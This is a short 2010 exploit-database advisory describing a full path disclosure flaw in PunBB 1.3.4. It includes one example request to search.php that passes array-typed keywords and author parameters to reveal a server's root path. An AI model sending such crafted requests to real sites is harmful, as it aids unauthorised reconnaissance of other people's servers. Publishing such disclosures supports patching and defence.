Punbb 1.3.4 Full Path Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Punbb 1.3.4 Full Path Disclosure Vulnerability
# Published : 2010-11-07
# Author : SYSTEM_OVERIDE
# Previous Title : MemHT Portal 4.0.1 Stored Cross Site Scripting Vulnerability
# Next Title : Joomla Component JQuarks4s 1.0.0 Blind SQL Injection Vulnerability

# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4


Vulnerability Details:

The vulnerabilities are in the file and the file /search.php and /userlist.php not properly control the content of variables keywords and author.
An attacker can exploit this to find out the rootpath a website.

Example:

http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search


#SYSTEM_OVERIDE [07-11-2010]